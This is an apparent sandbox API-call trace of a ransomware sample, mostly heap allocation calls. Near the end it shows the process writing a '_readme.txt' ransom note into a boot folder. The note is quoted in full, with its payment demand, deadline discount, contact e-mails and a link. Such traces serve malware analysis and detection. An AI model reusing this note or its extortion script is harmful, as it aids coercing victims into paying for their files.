RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.739] PathFindFileNameW (pszPath="C:\\Boot\\fi-FI\\") returned="fi-FI\\" [0142.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.740] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0142.740] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.740] PathFindFileNameW (pszPath="") returned="" [0142.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.740] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0142.740] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0142.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x3221ae8 [0142.740] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3221ae8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0142.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x9aaf2b8 [0142.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.740] FreeLibrary (hLibModule=0x759d0000) returned 1 [0142.740] PathAppendW (in: pszPath="C:\\Boot\\fi-FI\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 1 [0142.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.741] PathFileExistsW (pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 0 [0142.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x9ad6f98 [0142.741] lstrcpyW (in: lpString1=0x9ad6f98, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" [0142.741] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d", lpString2="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" [0142.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9ab03c8 [0142.741] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\_readme.txt" (normalized: "c:\\boot\\fi-fi\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6f0 [0142.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x3221ae8 [0142.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x85b) returned 0x325d510 [0142.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", cchWideChar=-1, lpMultiByteStr=0x325d510, cbMultiByte=2139, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", lpUsedDefaultChar=0x0) returned 1116 [0142.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x321dfc8 [0142.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.742] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned 1115 [0142.742] WriteFile (in: hFile=0x6f0, lpBuffer=0x321dfc8*, nNumberOfBytesToWrite=0x45b, lpNumberOfBytesWritten=0x9dbfb64, lpOverlapped=0x0 | out: lpBuffer=0x321dfc8*, lpNumberOfBytesWritten=0x9dbfb64*=0x45b, lpOverlapped=0x0) returned 1 [0142.743] CloseHandle (hObject=0x6f0) returned 1 [0142.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321dfc8 | out: hHeap=0x620000) returned 1 [0142.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ab03c8 | out: hHeap=0x620000) returned 1 [0142.743] HeapFree (in: 